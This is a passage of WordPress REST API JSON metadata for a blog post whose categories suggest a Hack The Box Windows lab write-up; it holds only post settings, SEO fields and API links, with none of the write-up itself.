&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,13],"tags":[],"class_list":["post-293","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=293"}],"version-history":[{"count":7,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293\/revisions"}],"predecessor-version":[{"id":300,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/293\/revisions\/300"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=293"}],"wp:term":[{"taxonomy":"c
ategory","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}